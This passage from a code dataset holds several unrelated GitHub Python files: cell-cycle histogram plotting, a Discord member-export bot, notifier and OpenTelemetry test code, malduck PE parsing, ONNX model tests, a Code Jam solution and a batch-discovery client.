'Endo/Exo', 'Cond', 'Time'], inplace=True)\nprint(newIndex)\n\ndf.columns = newIndex.index\ndf.columns.sortlevel(sort_remaining=True)\ndf\n\n\n# In[180]:\n\n\ns = slice(0,1024)\n\nplt.figure()\nplt.plot(df.loc[s, idx['H', 'N':'X', 'D', :]])\nplt.show()\n\n\n# In[5]:\n\n\nhist['Events'].nonzero()[0][-1]\n\n\n# In[259]:\n\n\ndef filterDat(data, num=11):\n ones = boxcar(num)/num\n result = np.convolve(data, ones, mode='same')\n \n return result\n\n\n# In[366]:\n\n\ndef shift(data):\n data = savgol_filter(data.values, 31, 3)\n old_x = np.linspace(0,1023,1024)\n \n # Stretch\n secondIndex =200\n indexes, prop = find_peaks(data, height=5, distance=120)\n print(indexes)\n print(prop)\n \n if indexes.size==2:\n width = 200/(indexes[1]-indexes[0])\n print(width)\n new_x = np.arange(200-(indexes[0]*width), (1024*width+(200-(indexes[0]*width))), width)\n \n if new_x.size>1024:\n new_x = new_x[0:1024]\n new_data = np.interp(old_x, new_x, data)\n \n return new_data/(data.sum()*width)\n \n elif indexes.size==1:\n new_x = old_x*400/indexes[0]\n new_data = np.interp(old_x, new_x, data)\n return new_data/(data.sum()*(400/indexes[0]))\n \n \n return new_data/(data.sum()*width)\n else:\n return data/data.sum()\n \"\"\"\n difference = secondIndex-secondMaxIndex\n ratio = secondIndex/(secondMaxIndex)\n old_x = np.linspace(0, int(len(data))-1, int(len(data)))\n new_x = np.linspace(0, int(len(data))-1, int(len(data)*ratio))\n\"\"\"\n \n\n\n# In[370]:\n\n\n#df_filt = df.apply(filterDat)\ndf_sav = df.apply(shift)\n\n\n# In[367]:\n\n\nshift(df.loc[s, idx['H', 'X', 'D', 24]])\n\n\n# In[368]:\n\n\nplt.figure()\n#plt.plot(df.loc[s, idx['H', 'X', 'D', 24]])\nplt.plot(shift(df.loc[s, idx['H', 'X', 'D', 24]]))\nplt.show()\n\n\n# In[352]:\n\n\ns = slice(0,1024)\n\n\nfig, axes = plt.subplots(figsize=(8, 6))\n\nplt.plot(df_sav.loc[s, idx['M', :, ('C','D'), :]])\n\n\naxes.legend()\n\naxes.set_ylabel('% of 
Total')\naxes.set_xlabel(\"DNA content (Arbitrary Units)\")\naxes.set_xlim(100, 550)\naxes.xaxis.set_major_locator(plt.NullLocator())\naxes.xaxis.set_major_formatter(plt.NullFormatter())\n#axes.set_ylim(0, 100)\naxes.set_title(\"MDA-MB-231 Cell Cycle, 50nM Docetaxel\")\nplt.show()\nplt.savefig('MDA_Cell_Cycle', bbox_inches='tight')\n\n\n# In[374]:\n\n\nfig, axes = plt.subplots(1, 4, figsize=(8, 2.5), sharey=True)\nfig.suptitle('MDA-MB-231')\naxes[0].plot(df_sav.loc[s, idx['M', 'N', 'C', 24]])\naxes[0].set_title('Control')\naxes[1].plot(df_sav.loc[s, idx['M', 'N', 'D', 8]])\naxes[1].set_title('8h')\naxes[2].plot(df_sav.loc[s, idx['M', 'N', 'D', 24]])\naxes[2].set_title('24h')\naxes[3].plot(df_sav.loc[s, idx['M', 'X', 'D', 24]])\naxes[3].set_title('Exo 24h')\n#fig.subplots_adjust(hspace=0)\nfor ax in axes:\n ax.set_xlim(50, 550)\n ax.xaxis.set_major_locator(plt.NullLocator())\n ax.xaxis.set_major_formatter(plt.NullFormatter())\n ax.set_ylim(0, .025)\n ax.label_outer()\n \naxes[0].set_ylabel('% of Total')\naxes[1].set_xlabel(\"DNA content\")\naxes[2].set_xlabel(\"(Arbitrary Units)\")\nplt.show()\nplt.savefig('MDA_Cell_Cycle.png', bbox_inches='tight', dpi=300, format='png')\n\n\n# In[152]:\n\n\ny[137]\n\n","repo_name":"0xKyleCode/DBCCode","sub_path":"Cell_Cycle_Histogram.py","file_name":"Cell_Cycle_Histogram.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35417041991","text":"# NOTE: Make sure your APP/BOT has the guild_members intent enabled in the developer portal\n\nto_download = [285898487554375681, 642867988940324879]\n\nbot_token = \"TOKEN\"\n\n# Everything below this line can be ignored\n\nimport naff\nimport pandas as pd\n\nintents = naff.Intents.new(\n guild_members=True,\n guilds=True,\n)\n\nbot = naff.Client(\n intents=intents,\n sync_interactions=True,\n basic_logging=True,\n)\n\n\n@naff.listen(naff.events.Startup, delay_until_ready=True)\nasync def download_members():\n print(\"Ready!\")\n for guild_id in to_download:\n guild = bot.get_guild(guild_id)\n # save the members into a csv with the guild_id,member_id,tag\n print(f\"Downloading {guild.name}...\")\n # chunk all the members\n # it takes ten seconds for each 1000 members\n print(\n f\"Chunking... {guild.member_count} members. ETA: {guild.member_count / 1000 * 10} seconds\"\n )\n await guild.chunk()\n print(\"Done chunking!\")\n print(f\"Saving {guild.name}...\")\n # use pandas to save the members\n df = pd.DataFrame(\n [\n {\n \"guild_id\": guild_id,\n \"member_id\": member.id,\n \"tag\": member.tag,\n }\n for member in guild.members\n ]\n )\n df.to_csv(f\"{guild_id}.csv\", index=False)\n print(\"Done saving!\")\n\n print(f\"Done with {guild_id}\")\n\n print(\"Done downloading all members!\")\n print(\"Go to compare.py and put in the 2 file names.\")\n await bot.stop()\n\n\nbot.start(bot_token)\n","repo_name":"Wolfhound905/member-compare-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"40186285561","text":"from .exceptions import NotificationError\nfrom .utils import log, request\n\n\nclass BaseNotifier(object):\n def __init__(self):\n self.name = None\n self.token = None\n self.retcode_key = None\n self.retcode_value = None\n\n def send(self, text, status, desp):\n ...\n\n def push(\n self, method, url, params=None, data=None, json=None, headers=None, proxies=None\n ):\n \"\"\"\n 🚫: disabled\n 🥳: success\n 😳: failure\n \"\"\"\n if not self.token:\n # log.info(f'{self.name} 🚫')\n return\n try:\n response = request(\n method, url, 2, params, data, json, headers, proxies=proxies\n )\n except Exception as e:\n log.error(f'{self.name} 😳\\n{e}')\n raise NotificationError()\n else:\n if self.name == 'Server Chan Turbo':\n retcode = response.json().get('data', {}).get(self.retcode_key, -1)\n elif self.name == 'Discord' or self.name == 'gotify':\n retcode = response.status_code\n else:\n retcode = response.json().get(self.retcode_key, -1)\n if retcode == self.retcode_value:\n log.info(f'{self.name} 🥳')\n\n # Telegram Bot\n elif self.name == 'Telegram Bot' and retcode:\n log.info(f'{self.name} 🥳')\n elif (\n self.name == 'Telegram Bot'\n and response.json()[self.retcode_value] == 400\n ):\n log.error(f'{self.name} 😳\\n请主动给 bot 发送一条消息并检查 TG_USER_ID 是否正确')\n log.error(response.json())\n raise NotificationError()\n elif (\n self.name == 'Telegram Bot'\n and response.json()[self.retcode_value] == 401\n ):\n log.error(f'{self.name} 😳\\nTG_BOT_TOKEN 错误')\n log.error(response.json())\n raise NotificationError()\n # Chanify\n elif self.name == 'Chanify' and response.json().get('request-uid'):\n log.info(f'{self.name} 🥳')\n\n else:\n log.error(f'{self.name} 😳\\n{response}')\n log.error(response.json())\n raise NotificationError()\n # 一个推送渠道失败后不会继续进行推送\n finally:\n return\n","repo_name":"Xm798/Genshin-Dailynote-Reminder","sub_path":"dailynotereminder/notifiers/basenotifier.py","file_name":"basenotifier.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"809667315","text":"import os\nimport unittest\nfrom io import StringIO\nfrom unittest.mock import patch\n\nimport sumologic_opentelemetry.env\n\n\ndef capture_stdout(function, *args, **kwargs):\n @patch(\"sys.stdout\", new_callable=StringIO)\n def invoke(mock_stdout):\n ret = function(*args, **kwargs)\n stdout = mock_stdout.getvalue()\n return ret, stdout\n\n return invoke()\n\n\nclass EnvTestCase(unittest.TestCase):\n def assert_env_vars_in_stdout(self, stdout, expected):\n for key, value in expected:\n self.assertRegex(\n stdout,\n r\"{key}\\w*=\\w*{value}\\w*\".format(key=key, value=value),\n f\"{key}={value} not found in stdout\",\n )\n\n def test_dump_prints_defaults(self):\n expected_env_values = [\n (\"OTEL_PROPAGATORS\", \"tracecontext,baggage,b3,b3multi,jaeger,xray,ottrace\"),\n (\"OTEL_TRACES_EXPORTER\", \"otlp_proto_http\"),\n ]\n sumologic_opentelemetry.env.generate()\n _, stdout = capture_stdout(sumologic_opentelemetry.env.dump)\n self.assert_env_vars_in_stdout(stdout, expected_env_values)\n\n def test_dump_prints_non_defaults(self):\n expected_env_values = [(\"OTEL_LOG_LEVEL\", \"info\")]\n os.environ[\"OTEL_LOG_LEVEL\"] = \"info\"\n _, stdout = capture_stdout(sumologic_opentelemetry.env.dump)\n self.assert_env_vars_in_stdout(stdout, expected_env_values)\n\n def test_generate_defaults(self):\n sumologic_opentelemetry.env.generate()\n self.assertIn(\"OTEL_PROPAGATORS\", os.environ)\n self.assertIn(\"OTEL_TRACES_EXPORTER\", os.environ)\n\n def test_generate_skips_existing(self):\n os.environ[\"OTEL_PROPAGATORS\"] = \"non-default-value\"\n sumologic_opentelemetry.env.generate()\n self.assertEqual(os.environ[\"OTEL_PROPAGATORS\"], \"non-default-value\")\n","repo_name":"SumoLogic/sumologic-opentelemetry-python","sub_path":"test/env_test.py","file_name":"env_test.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"32196684159","text":"from typing import List, Optional\r\n\r\nfrom ..dnpe import DnPE\r\nfrom .binmem import ProcessMemoryBuffer\r\nfrom .procmempe import ProcessMemoryPE\r\nfrom .region import Region\r\n\r\n__all__ = [\"ProcessMemoryDnPE\", \"procmemdnpe\"]\r\n\r\n\r\nclass ProcessMemoryDnPE(ProcessMemoryPE):\r\n\r\n __magic__ = b\"MZ\"\r\n\r\n def __init__(\r\n self,\r\n buf: ProcessMemoryBuffer,\r\n base: int = 0,\r\n regions: Optional[List[Region]] = None,\r\n image: bool = False,\r\n detect_image: bool = False,\r\n ) -> None:\r\n self._pe: Optional[DnPE] = None\r\n super(ProcessMemoryPE, self).__init__(\r\n buf, base=base, regions=regions, image=image, detect_image=detect_image\r\n )\r\n\r\n def _pe_direct_load(self, fast_load: bool = True) -> DnPE:\r\n offset = self.v2p(self.imgbase)\r\n if offset is None:\r\n raise ValueError(\"imgbase out of regions\")\r\n # Expected m type: bytearray\r\n m = bytearray(self.readp(offset))\r\n pe = DnPE(data=m, fast_load=fast_load)\r\n return pe\r\n\r\n def is_valid(self) -> bool:\r\n if self.readv(self.imgbase, 2) != self.__magic__:\r\n return False\r\n pe_offs = self.uint32v(self.imgbase + 0x3C)\r\n if pe_offs is None:\r\n return False\r\n if self.readv(self.imgbase + pe_offs, 2) != b\"PE\":\r\n return False\r\n try:\r\n dn = DnPE(self)\r\n if not hasattr(dn, \"net\"):\r\n return False\r\n\r\n return True\r\n except Exception:\r\n return False\r\n\r\n @property\r\n def pe(self) -> DnPE:\r\n \"\"\"Related :class:`PE` object\"\"\"\r\n if self._pe is None:\r\n self._pe = DnPE(self)\r\n return self._pe\r\n\r\n\r\nprocmemdnpe = ProcessMemoryDnPE\r\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/procmem/procmemdnpe.py","file_name":"procmemdnpe.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"}
+{"seq_id":"74520575874","text":"import matplotlib.pyplot as plt\n\nfrom utilities import *\n\n# !pip install h5py\nX_train, y_train, X_test, y_test = load_data()\n\nprint(\"taille de mon set d'entrainement sur x\", X_train.shape)\nprint(\"taille de mon set d'entrainement sur y\", y_train.shape)\n\nprint(\"taille de mon set de test sur x\", X_test.shape)\nprint(\"taille de mon set de test sur Y\", y_test.shape)\n\n# y_train = y_train.T\n# y_test = y_test.T\n#\n# X_train = X_train.T\n# X_train_reshape = X_train.reshape(-1, X_train.shape[-1]) / X_train.max()\n# X_test = X_test.T\n# X_test_reshape = X_test.reshape(-1, X_test.shape[-1]) / X_train.max()\n#\n# print(\"taille de mon set d'entrainement transposé sur x\", X_train.shape)\n# print(\"taille de mon set d'entrainement transposé and reshaped sur x\", X_train_reshape.shape)\n# print(\"taille de mon set d'entrainement transposé sur y\", y_train.shape)\n# #\n# m_train = 300\n# m_test = 80\n# a = X_test.reshape[:, :m_test]\n# print(\"taille de mon set d'entrainement reshaped sur x\", a.shape)\n\n# x_train_reshape = X_train.reshape[:, :m_train]\n# y_train=y_train[:, :m_train]\n# y_test=y_test[:, :m_test]\n#\n# print(\"taille de mon set d'entrainement sur x\", x_train_reshape.shape)\n# print(\"taille de mon set de test sur x\", x_test_reshape.shape)\n# print(\"taille de mon set d'entrainement sur y\", y_train.shape)\n# print(\"taille de mon set de test sur y\", y_test.shape)\n# plt.figure(figsize=(10,10))\n# plt.imshow(x_train[0])\n# plt.show()\n\n\n# facon copilot d'afficher les 10 premiere photo\n# plt.figure(figsize=(16, 8))\n# for i in range(9):\n# plt.subplot(3, 3, i+1)\n# plt.imshow(x_train[i])\n# plt.title(y_train[i])\n# plt.axis('off')\n# plt.show()\n\n\n# facon youtube pour afficher les 10 premiere photo\nplt.figure(figsize=(16, 8))\nfor i in range(1, 10):\n plt.subplot(4, 5, i)\n plt.imshow(X_train[i], cmap='gray')\n if y_train[i] == 0:\n plt.title('cat')\n else:\n plt.title('dog')\n # plt.title(y_train[i])\n plt.tight_layout()\nplt.show()\n","repo_name":"hichemseriket/monReseauDeNeuronnes","sub_path":"chatVSchien.py","file_name":"chatVSchien.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1234383477","text":"import os\nimport sys\n\nimport numpy as np\nimport onnxruntime as rt\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"../\"))\ntry:\n from tools.onnx_converter import smartPickleLoader\nexcept Exception:\n raise\n\n\ndef test_clf():\n sklearn_clf = smartPickleLoader(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.model\")\n )\n onnx_clf = rt.InferenceSession(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.model.onnx\")\n )\n\n clf_in_name = onnx_clf.get_inputs()[0].name\n clf_out_name = onnx_clf.get_outputs()[0].name\n\n vec = np.random.rand(10000, 7) * 1 - 1.7\n assert (sklearn_clf.predict(vec) == onnx_clf.run([clf_out_name], {clf_in_name: vec.astype(np.float32)})[0]).all()\n\n\ndef test_scaler():\n sklearn_scaler = smartPickleLoader(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.scaler\")\n )\n onnx_scaler = rt.InferenceSession(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.scaler.onnx\")\n )\n\n scaler_in_name = onnx_scaler.get_inputs()[0].name\n scaler_out_name = onnx_scaler.get_outputs()[0].name\n\n vec = np.random.rand(10000, 7) * 100 - 200\n assert (\n np.max(\n np.abs(\n sklearn_scaler.transform(vec)\n - onnx_scaler.run([scaler_out_name], {scaler_in_name: vec.astype(np.float32)})[0]\n )\n )\n < 1e-3\n )\n","repo_name":"TangWen920812/ATM2022","sub_path":"docker/lungsegitk/test/test_sklearn_onnx.py","file_name":"test_sklearn_onnx.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"23547355121","text":"import sys\n\nsys.setrecursionlimit(3000)\n\nt = int(input())\n \ndef replacer(a, k):\n\t\n\treturn a\n\t\ndef flip(s, m, c):\n\tt = s.find('-')\n\n\ta = s[t:t+m]\n\n\tif len(a) < m or c > 3000:\n\t\treturn 'IMPOSSIBLE'\n\telse:\n\t\ta = a.replace('+','p').replace('-', 'n')\n\t\ta = a.replace('p', '-').replace('n', '+')\n\t\tb = s[:t] + a + s[t+m:]\n\t\t\n\t\tif '-' in b:\n\t\t\treturn flip(b, m, c+1)\n\t\telse:\n\t\t\treturn c\n\nfor i in range(1, t + 1):\n\tn, m = [str(s) for s in input().split(\" \")]\n\tm = int(m)\n\tif '-' in n:\n\t\tnumero = flip(n,m,1)\n\n\t\tprint(\"Case #{}: {}\".format(i,numero))\n\telse:\n\t\tprint(\"Case #{}: {}\".format(i, 0) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3748.py","file_name":"3748.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28896549180","text":"from __future__ import print_function\n\nimport atexit\nimport copy\nimport datetime\ntry:\n # ujson is 5x-10x faster\n import ujson as json\nexcept ImportError:\n import json\nimport logging\nimport os\nimport Queue\nimport re\nimport sys\nimport time\n\nfrom concurrent import futures\nimport requests\n\nfrom waldoc import client\n\nLOG = logging.getLogger(__name__)\n\n\nclass DiscoveryMonitorTimeoutError(Exception):\n\n \"\"\"Discovery is considered stale, something probably went wrong.\"\"\"\n\n\nclass PersistenceFile(object):\n\n \"\"\"Wrapper for the batch discovery JSON persistence file.\n\n Default file location in shell.py:\n ~/.waldo_batch_discoveries.json\n\n May include a thread-safe queue for passing data\n in the form below (schema).\n\n Tuples will be formatted to json according to the schema\n of the peristence file upon calling self.write_queued()\n\n Schema:\n {\n : {\n : ,\n : ,\n }\n : {\n : ,\n : ,\n }\n }\n\n P.S. - 'synq' -> Synchronized Queue\n \"\"\"\n def __init__(self, path, writer_queue=None):\n \"\"\"Initialize using path to file and optional thread-safe queue.\n\n Queue is used for json serializable data to be written to file when\n self.write_queued() is called.\n\n If the file at 'path' doesn't exist it will be created.\n \"\"\"\n\n self.path = os.path.realpath(os.path.expanduser(path))\n if not os.path.exists(self.path):\n print(\"Persistence file %s does not exist yet, creating it...\")\n json.dump({}, open(self.path, 'w'))\n else:\n # check for json-ness\n try:\n json.load(open(self.path))\n LOG.debug(\"Loaded existing persistence file %s.\",\n os.path.relpath(self.path))\n except ValueError as err:\n raise ValueError(\"The persistence file -> %s is not \"\n \"a valid json file. | %s\"\n % (os.path.relpath(self.path), err))\n if writer_queue and not isinstance(writer_queue, Queue.Queue):\n raise TypeError('writer_queue should be a Queue.Queue.')\n elif writer_queue:\n self.synq = writer_queue\n self.synq._persisted = set()\n else:\n self.synq = None\n\n def load(self):\n \"\"\"Return the deserialized json object.\"\"\"\n return json.load(open(self.path))\n\n def save(self, data):\n \"\"\"Save data to file.\n\n Careful, this overwrites any existing data on file.\n Use self.udpate() to perform partial updates.\n \"\"\"\n json.dump(data, open(self.path, 'w'))\n\n def set_queue(self, writer_queue=None):\n \"\"\"Provide a queue or have one created for you.\n\n Always return the queue and set it as self.synq\n \"\"\"\n if writer_queue and not isinstance(writer_queue, Queue.Queue):\n raise TypeError('writer_queue should be a Queue.Queue.')\n elif not writer_queue:\n writer_queue = Queue.Queue()\n self.synq = writer_queue\n return self.synq\n\n def get_queue(self):\n \"\"\"Return the queue associated with this file wrapper.\"\"\"\n if not self.synq:\n raise AttributeError(\"No queue specified, set one with \"\n \"self.set_queue(Queue...)\")\n return self.synq\n\n def write_queued(self):\n \"\"\"Write data from the backing synchronized queue the file.\"\"\"\n if not self.synq:\n raise AttributeError(\"No queue specified, set one with \"\n \"self.set_queue(Queue...)\")\n towrite = {}\n while not self.synq.empty():\n try:\n towrite.update(self.synq.get_nowait())\n except Queue.Empty:\n pass\n return self.update(towrite)\n\n def update(self, data):\n \"\"\"Perform a friendly update of the json on file.\n\n Works like a dictionary-merge going 1 level deep.\n\n Ex:\n\n existing file # persistence.json\n 
---------------------------------\n # persistence.json\n {\n 'target_a': {\n 'tag_1': 'uuid_abc',\n }\n }\n\n self.update({'target_a': {'tag_2': 'uuid_xyz'},\n 'target_b': {'tag_1': 'uuid_def'}})\n\n The 'target_a' dictionary will be merged, and\n target_b would be added, resulting in:\n\n updated file # persistence.json\n --------------------------------\n {\n 'target_a': {\n 'tag_1': 'uuid_abc',\n 'tag_2': 'uuid_xyz',\n },\n 'target_b': {\n 'tag_1': 'uuid_def',\n }\n }\n\n \"\"\"\n updating = self.load()\n check_delta = copy.deepcopy(updating)\n for target, document in data.iteritems():\n if target in updating and document != updating[target]:\n LOG.debug(\"Updating existing target %s record in persistence file \"\n \"with tags: %s\", target, document.keys())\n updating[target].update(document)\n elif target in updating and document == updating[target]:\n # nothing to update\n continue\n else:\n LOG.debug(\"Adding target %s to persistence file.\", target)\n updating[target] = document\n # only open/write file if there are changes\n if updating != check_delta:\n self.save(updating)\n\n def purge(self):\n \"\"\"Replace all data on file with an empty object, '{}'.\"\"\"\n decision = raw_input(\"\\nAre you sure you want to reset your \"\n \"persistence file %s? \"\n % os.path.relpath(self.path))\n if not 'y' in decision.lower():\n print(\"Aborting purge.\")\n return\n self.save({})\n\n def remove(self, targets=None, tags=None):\n \"\"\"Remove items from persisted data which match tags or targets.\"\"\"\n if not targets and not tags:\n raise AttributeError(\n \"No 'targets' or 'tags' specified for removal.\")\n persisted = self.load()\n # create object that is the loaded data minus tags and targets and re-write it\n excluding = {}\n removed = 0\n for trgt, data in persisted.items():\n if targets and trgt in targets:\n # skip the entire target\n removed += len(data)\n continue\n excluding[trgt] = data\n for tag in data.iterkeys():\n if tags and tag in tags:\n # remove selected tags\n if excluding[trgt].pop(tag, None):\n removed += 1\n continue\n remaining = sum((len(k) for k in excluding.values()))\n print(\"Removed %s items, leaving %s remaining.\"\n % (removed, remaining))\n self.save(excluding)\n\n\n def list_targets_by_tags(self, seedtags):\n \"\"\"Load list of targets from persistence file based on tags.\"\"\"\n loaded = self.load()\n matched_targets = [k for k, v in loaded.iteritems()\n if all(j in v for j in seedtags)]\n if not matched_targets:\n raise StandardError(\"No existing targets found in persistence file \"\n \"from tags: '%s'\", \"', '\".join(seedtags))\n return matched_targets\n\n\ndef is_netloc(netloc):\n try:\n int(netloc)\n return False\n except ValueError:\n return True\n\n\ndef to_datetime(time_string):\n \"\"\"Convert standard time string to a datetime object.\"\"\"\n try:\n return datetime.datetime.strptime(\n time_string, '%Y-%m-%d %X %z')\n except ValueError:\n time_string = time_string[:-5].strip()\n return datetime.datetime.strptime(\n time_string, '%Y-%m-%d %X')\n\n\ndef from_targets_file(targets_file):\n \"\"\"Load targets from file.\"\"\"\n if not os.path.exists(targets_file):\n raise ValueError(\"Targets file %s does not exist.\",\n os.path.relpath(targets_file))\n else:\n with open(targets_file, 'rU') as tfile:\n targets = list({m.strip() for k in tfile.readlines()\n for m in k.split() if m.strip()})\n for target in copy.copy(targets):\n if target.startswith('#'):\n targets.remove(target)\n continue\n if '.' 
not in target and ':' not in target:\n try:\n int(target)\n except StandardError:\n targets.remove(target)\n if not targets:\n raise ValueError(\"No targets were found in file %s.\",\n os.path.relpath(targets_file))\n else:\n print(\"Loaded targets from file %s\" % targets_file)\n return targets\n\n\ndef should_skip(target, tags, persistence_file):\n \"\"\"Find existing discovery id with matching target and tags.\"\"\"\n persisted_data = persistence_file.load().get(target)\n if persisted_data:\n discovery_id = {persisted_data.get(t) for t in tags}\n if all(discovery_id) and len(discovery_id) == 1:\n return discovery_id.pop()\n # a single discovery must match *all* tags for should_skip\n # to return a discovery id\n\n\ndef purge_persistence_file(persistence_file, targets=None, tags=None):\n\n if not os.path.exists(persistence_file):\n raise ValueError(\"Persistence file %s does not exist. \"\n \"Nothing to purge.\"\n % os.path.relpath(persistence_file))\n persistence_file = PersistenceFile(persistence_file)\n if not targets and not tags:\n persistence_file.purge()\n else:\n persistence_file.remove(targets=targets, tags=tags)\n\n\ndef get_persisted_data(persistence_file, tags=None, targets=None):\n\n if not isinstance(persistence_file, PersistenceFile):\n raise TypeError(\n \"persistence_file should be an instance of PersistenceFile\")\n loaded = persistence_file.load()\n if targets:\n loaded = {j: k for j, k in loaded.items()\n if j in targets}\n if tags:\n loaded = {j: k for j, k in loaded.items()\n if all(tag in k for tag in tags)}\n for data in loaded.itervalues():\n for tag in data.copy().iterkeys():\n if tag not in tags:\n data.pop(tag, None)\n return loaded\n\n\ndef show_persisted_data(args):\n\n persistence_file = PersistenceFile(args.persistence_file)\n loaded = get_persisted_data(persistence_file, args.tags, args.targets)\n import json as orig_json\n print(orig_json.dumps(loaded, sort_keys=True, indent=4))\n\ndef batch_discovery(args):\n \"\"\"Run, manage, and monitor a batch discovery.\"\"\"\n\n pfile_queue = Queue.Queue()\n persistence_file = PersistenceFile(args.persistence_file,\n writer_queue=pfile_queue)\n\n if args.targets:\n targets = args.targets\n elif args.targets_file:\n targets = from_targets_file(args.targets_file)\n else:\n if not args.seed_tags:\n decision = raw_input(\n \"\\nNo --seed-tags, --targets, or --targets-file provided. \"\n \"Continue using current tag(s) -> %s as seed tags for new \"\n \"batch discovery? ( To see which targets this implies, run \"\n \"`waldo batch data --tags %s` ) \"\n % (args.tags, \" \".join(args.tags)))\n if not 'y' in decision.lower():\n print(\"Aborting batch discovery.\")\n return\n else:\n new_tag_name = raw_input(\n \"%s will be used as seed tag(s). Now you need new tag \"\n \"name: \" % args.tags)\n if not new_tag_name:\n print(\"Invalid tag name. Aborting.\")\n else:\n args.seed_tags = args.tags\n args.tags = [j.strip()\n for j in re.split(r'\\W+', new_tag_name)]\n targets = persistence_file.list_targets_by_tags(\n args.seed_tags or args.tags)\n\n assert targets, \"No targets (netlocs or account numbers) provided\"\n waldo_client = client.Waldo(args.username, password=args.password,\n token=args.token, password_from_user=True)\n\n store = {}\n job_queue = {}\n with futures.ThreadPoolExecutor(args.max_running) as pool:\n ensure_streamhandler()\n try:\n while targets:\n selected = targets.pop()\n LOG.debug(\"Looking at %s. 
Targets remaining: %s\",\n selected, len(targets))\n # should_skip returns the discovery_id if we already have one\n # for this target/tags combo\n shouldskip = should_skip(selected, args.tags,\n persistence_file)\n if shouldskip:\n store[selected] = {tag: shouldskip for tag in args.tags}\n fut = pool.submit(monitor_discovery, shouldskip, waldo_client)\n atexit.register(fut.cancel)\n print(\"Monitoring existing discovery %s for \"\n \"target %s with tag(s): %s\"\n % (shouldskip, selected, args.tags))\n else:\n store[selected] = {tag: None for tag in args.tags}\n fut = pool.submit(create_and_monitor_discovery, selected,\n waldo_client, args.dataplane, args.tags,\n persistence_file.synq)\n atexit.register(fut.cancel)\n print(\"Triggered discovery (dataplane: %s) for \"\n \"target %s with tag(s): %s\"\n % (args.dataplane, selected, args.tags))\n persistence_file.update(store)\n time.sleep(.25)\n\n job_queue[fut] = selected\n atexit.register(pool.shutdown, wait=False)\n return manage_job_queue(job_queue, persistence_file)\n except KeyboardInterrupt:\n print(\"\\nShutting down threadpool...\")\n for job in job_queue:\n job.cancel()\n pool.shutdown(wait=False)\n sys.exit('KeyboardInterrupt')\n\n\ndef manage_job_queue(job_queue, persistence_file):\n\n results = {}\n oldstats = {}\n while not all(k._state == 'FINISHED' for k in job_queue):\n # create a dict of stats using Futures in job_queue\n # print them when each loop only if they've changed\n persistence_file.write_queued()\n time.sleep(1)\n states = [job._state for job in job_queue]\n newstats = {_state: states.count(_state) for _state in set(states)}\n if newstats != oldstats:\n import json as orig_json\n print(\"Job queue stats:\")\n print(orig_json.dumps(newstats, sort_keys=True, indent=4))\n oldstats = newstats\n finished = [j for j in job_queue if j._state == 'FINISHED'\n and job_queue[j] not in results]\n for job in finished:\n try:\n result = job.result()\n except Exception as err:\n print(err)\n result = err\n did = 'unknown'\n dstatus = \"%s: %s\" % (err.__class__.__name__, err)\n else:\n did = result['id']\n dstatus = result['status']\n trgt = job_queue[job]\n results[trgt] = result\n print(\"%s finished. 
Status: %s ID: %s\"\n % (trgt, dstatus, did))\n\n\n for job, target in job_queue.iteritems():\n try:\n result = job.result()\n except Exception as err:\n print(err)\n result = err\n results[target] = result\n\n return results\n\n\nclass CurrentFileFilter(logging.Filter):\n \"\"\"Only emit logs originating in this file.\"\"\"\n\n name = \"%s Logging Filter\" % os.path.relpath(__file__)\n\n def filter(self, logrecord):\n \"\"\"Filter logs which don't originate in this file.\"\"\"\n if os.path.realpath(logrecord.pathname) != os.path.realpath(__file__):\n return False\n return True\n\n_CURRENTFILEFILTER = CurrentFileFilter()\nCurrentFileFilter = lambda: _CURRENTFILEFILTER\n\n\ndef ensure_streamhandler(level=logging.INFO):\n \"\"\"Ensure that a StreamHandler to stdout is attached to root logger.\"\"\"\n\n cffilt = CurrentFileFilter()\n frmt = logging.Formatter(fmt='%(asctime)s: %(message)s')\n rootlogger = logging.getLogger()\n if not rootlogger.isEnabledFor(level):\n rootlogger.setLevel(level)\n for hand in rootlogger.handlers:\n if isinstance(hand, logging.StreamHandler):\n if hand.level < level:\n hand.setLevel(level)\n if hand.stream != sys.stdout:\n hand.stream = sys.stdout\n hand.addFilter(cffilt)\n hand.setFormatter(frmt)\n break\n else:\n console = logging.StreamHandler(stream=sys.stdout)\n console.setLevel(level)\n console.set_name('Batch discovery stdout streamhandler')\n console.addFilter(cffilt)\n console.setFormatter(frmt)\n rootlogger.addHandler(console)\n\n\ndef create_and_monitor_discovery(target, waldo_client, dataplane,\n tags, pfqueue):\n \"\"\"Return discovery only after Waldo has finished it.\n\n Since this function is often ran in a separate thread, we will rely on\n the logging module to get messages to stdout, so ensure_streamhandler()\n is always called when the function runs.\n \"\"\"\n try:\n if is_netloc(target):\n discovery = waldo_client.create_discovery(netloc=target,\n dataplane=dataplane,\n tags=tags)\n else:\n discovery = waldo_client.create_discovery(account_number=target,\n dataplane=dataplane,\n tags=tags)\n rttags = discovery['metadata'].get('tags')\n assert rttags == tags\n assert bool(discovery['dataplane']) == bool(dataplane)\n except 